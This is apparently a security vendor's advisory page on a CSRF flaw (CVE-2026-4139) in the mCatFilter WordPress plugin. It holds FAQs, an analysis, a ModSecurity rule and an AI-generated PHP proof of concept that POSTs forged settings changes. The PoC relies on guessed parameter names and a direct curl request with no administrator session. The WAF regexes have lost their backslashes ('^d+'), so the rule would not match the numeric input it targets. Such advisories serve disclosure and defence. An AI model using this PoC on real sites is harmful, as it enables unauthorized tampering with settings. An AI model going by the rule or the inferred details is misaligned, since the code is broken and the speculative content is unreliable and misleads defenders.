What is CVE-2026-4139?

CVE-2026-4139 is a Cross-Site Request Forgery (CSRF) vulnerability in the mCatFilter plugin for WordPress, affecting versions up to and including 0.5.2. It allows unauthenticated attackers to modify plugin settings without proper validation, due to the lack of nonce verification in the compute_post() function.

How does the vulnerability work?

The compute_post() function processes settings updates via POST data without nonce or capability checks. This function is executed on every page load, enabling attackers to send forged POST requests to modify plugin settings if they can trick an administrator into performing an action.

Who is affected by this vulnerability?

Any WordPress site using the mCatFilter plugin version 0.5.2 or earlier is affected. Administrators should check their plugin versions to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the mCatFilter plugin installed. If it is version 0.5.2 or earlier, your site is at risk of this vulnerability.

What are the potential risks of this vulnerability?

The risk level is classified as Medium with a CVSS score of 4.3. While it does not allow for privilege escalation or data exfiltration, it enables unauthorized changes to plugin settings, which may disrupt site functionality or expose content unintentionally.

How can I mitigate this vulnerability?

To mitigate this vulnerability, you should disable the mCatFilter plugin or implement a virtual patch by adding nonce verification and capability checks in the compute_post() function. If a patched version is released, updating to that version is also essential.

What does 'Medium' severity mean in practical terms?

A Medium severity rating indicates that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized changes. Administrators should prioritize remediation to protect site integrity and functionality.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can craft a POST request to exploit the CSRF vulnerability. It shows that any WordPress URL can be targeted, and it outlines the expected parameter names that could be manipulated to change settings.

What are nonce verification and capability checks?

Nonce verification is a security measure used in WordPress to ensure that requests are valid and originate from the site. Capability checks verify that the user has the necessary permissions to perform certain actions, such as modifying settings.

Is there a patched version of the mCatFilter plugin?

As of now, there is no patched version of the mCatFilter plugin available. Administrators should either disable the plugin or implement a virtual patch until an official update is released.

What should I do if I am unable to disable the plugin?

If disabling the plugin is not an option, consider implementing a virtual patch by adding nonce verification and capability checks to the compute_post() function. Additionally, monitor your site for any unusual activity related to plugin settings.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 24, 2026

CVE-2026-4139: mCatFilter <= 0.5.2 – Cross-Site Request Forgery via compute_post() Function (mcatfilter)

CVE ID CVE-2026-4139

Plugin mcatfilter

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 0.5.2

Patched Version —

Disclosed April 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4139 (metadata-based): The mCatFilter plugin for WordPress, version 0.5.2 and earlier, contains a Cross-Site Request Forgery (CSRF) vulnerability in its compute_post() function. This function processes plugin settings updates via $_POST data without any nonce or capability validation. The vulnerability has a CVSS score of 4.3 (Medium) and can allow unauthenticated attackers to modify all plugin settings.

The root cause is the complete absence of nonce verification and capability checks within the compute_post() function. This function is called on every page load through the plugins_loaded hook, meaning it runs early in WordPress execution regardless of the user’s role. The function directly passes $_POST data to update_option() to modify plugin settings. Atomic Edge analysis infers this pattern from the CWE (352) and vulnerability description, as no source code diff is available. The description explicitly states there is no nonce or capability check, which is a confirmed detail from the vendor’s admission.

Exploitation requires tricking a site administrator into performing an action, such as clicking a malicious link or visiting a crafted page. An attacker can craft a POST request to any WordPress page (since the handler runs on plugins_loaded) with parameters that map to the plugin’s settings, including category exclusion rules, feed exclusion flags, and tag page exclusion flags. The request must include the wp_http_referer or simply be a POST submission to any WordPress URL. The specific parameter names are not disclosed, but typical WordPress plugin settings use checkbox or array parameters. The attack does not require authentication; the attacker only needs social engineering to trigger the administrator’s browser.

Remediation requires implementing standard WordPress CSRF protection. The plugin must add a nonce field to any form that modifies settings and verify that nonce in the compute_post() function using check_admin_referer() or wp_verify_nonce(). Additionally, capability checks such as current_user_can(‘manage_options’) should be added to ensure only authorized administrators can update settings. Since no patched version exists, administrators should disable the plugin or add a virtual patch.

Impact is limited to integrity of plugin settings only (CVSS impact sub-score: Low). An attacker could modify category exclusion rules to hide content from certain users, disable feed exclusions to expose content in RSS feeds, or alter tag page exclusions. This could lead to unintended content exposure or disruption of site functionality. No privilege escalation or data exfiltration is possible, but the CSRF vector allows unauthenticated attackers to change settings without the administrator’s consent.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-4139 (metadata-based)
# Block CSRF exploitation of mCatFilter compute_post() function
# The handler runs on plugins_loaded on all pages, but we target the likely settings page
# This rule blocks POST requests to the plugin's settings page without a valid nonce parameter
# Since the vulnerable function lacks nonce verification entirely, we block requests that
# contain the specific settings parameters commonly used by the plugin.

SecRule REQUEST_METHOD "@streq POST" "id:20261321,phase:2,deny,status:403,chain,msg:'CVE-2026-4139 CSRF attempt via mCatFilter',severity:'CRITICAL',tag:'CVE-2026-4139',tag:'WordPress',tag:'mcatfilter'"
  SecRule REQUEST_URI "@rx /wp-admin/options-general.php" "chain"
    SecRule ARGS_POST:mcat_categories_exclude "@rx ^d+(?:,d+)*$" "chain"
      SecRule ARGS_POST:mcat_feed_exclude "@rx ^[01]$" "chain"
        SecRule ARGS_POST:mcat_tag_page_exclude "@rx ^[01]$" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4139 - mCatFilter <= 0.5.2 - Cross-Site Request Forgery via compute_post() Function

// This PoC demonstrates crafting a POST request that triggers the compute_post() function
// to modify plugin settings. Since the function runs on plugins_loaded, any WordPress URL works.
// The exact parameter names are inferred from typical WordPress settings patterns.

$target_url = 'http://example.com/wp-admin/options-general.php?page=mcatfilter'; // Change to target site

// Inferred parameter names for mCatFilter plugin settings based on the vulnerability description:
// - mcat_categories_exclude[] : array of category IDs to exclude
// - mcat_feed_exclude : flag to exclude posts from feeds
// - mcat_tag_page_exclude : flag to exclude tag pages

// The actual parameter names may differ; this assumes common WordPress settings naming.
// The plugin uses update_option() so parameter names are likely stored as options.

$post_data = array(
    'mcat_categories_exclude' => array(1, 2, 3), // Exclude categories 1, 2, 3
    'mcat_feed_exclude' => '1',                    // Enable feed exclusion
    'mcat_tag_page_exclude' => '0'                 // Disable tag page exclusion
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_test_cookie=WP+Cookie+check'); // Optional: bypass cookie check
curl_setopt($ch, CURLOPT_HEADER, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo 'Exploit request sent successfully. Settings may have been updated.';
} else {
    echo 'Request failed with HTTP code: ' . $http_code;
}

Frequently Asked Questions

What is CVE-2026-4139?
Understanding the vulnerability
CVE-2026-4139 is a Cross-Site Request Forgery (CSRF) vulnerability in the mCatFilter plugin for WordPress, affecting versions up to and including 0.5.2. It allows unauthenticated attackers to modify plugin settings without proper validation, due to the lack of nonce verification in the compute_post() function.
How does the vulnerability work?
Mechanism of exploitation
The compute_post() function processes settings updates via POST data without nonce or capability checks. This function is executed on every page load, enabling attackers to send forged POST requests to modify plugin settings if they can trick an administrator into performing an action.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the mCatFilter plugin version 0.5.2 or earlier is affected. Administrators should check their plugin versions to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the mCatFilter plugin installed. If it is version 0.5.2 or earlier, your site is at risk of this vulnerability.
What are the potential risks of this vulnerability?
Impact on site integrity
The risk level is classified as Medium with a CVSS score of 4.3. While it does not allow for privilege escalation or data exfiltration, it enables unauthorized changes to plugin settings, which may disrupt site functionality or expose content unintentionally.
How can I mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, you should disable the mCatFilter plugin or implement a virtual patch by adding nonce verification and capability checks in the compute_post() function. If a patched version is released, updating to that version is also essential.
What does 'Medium' severity mean in practical terms?
Understanding CVSS scores
A Medium severity rating indicates that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized changes. Administrators should prioritize remediation to protect site integrity and functionality.
What does the proof of concept demonstrate?
Illustration of the vulnerability
The proof of concept illustrates how an attacker can craft a POST request to exploit the CSRF vulnerability. It shows that any WordPress URL can be targeted, and it outlines the expected parameter names that could be manipulated to change settings.
What are nonce verification and capability checks?
Security measures explained
Nonce verification is a security measure used in WordPress to ensure that requests are valid and originate from the site. Capability checks verify that the user has the necessary permissions to perform certain actions, such as modifying settings.
Is there a patched version of the mCatFilter plugin?
Current status of the plugin
As of now, there is no patched version of the mCatFilter plugin available. Administrators should either disable the plugin or implement a virtual patch until an official update is released.
What types of settings can be modified through this vulnerability?
Potential changes an attacker can make
An attacker can modify various settings within the mCatFilter plugin, including category exclusion rules, feed exclusion flags, and tag page exclusion flags. These changes can affect content visibility and site functionality.
What should I do if I am unable to disable the plugin?
Alternative actions to consider
If disabling the plugin is not an option, consider implementing a virtual patch by adding nonce verification and capability checks to the compute_post() function. Additionally, monitor your site for any unusual activity related to plugin settings.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations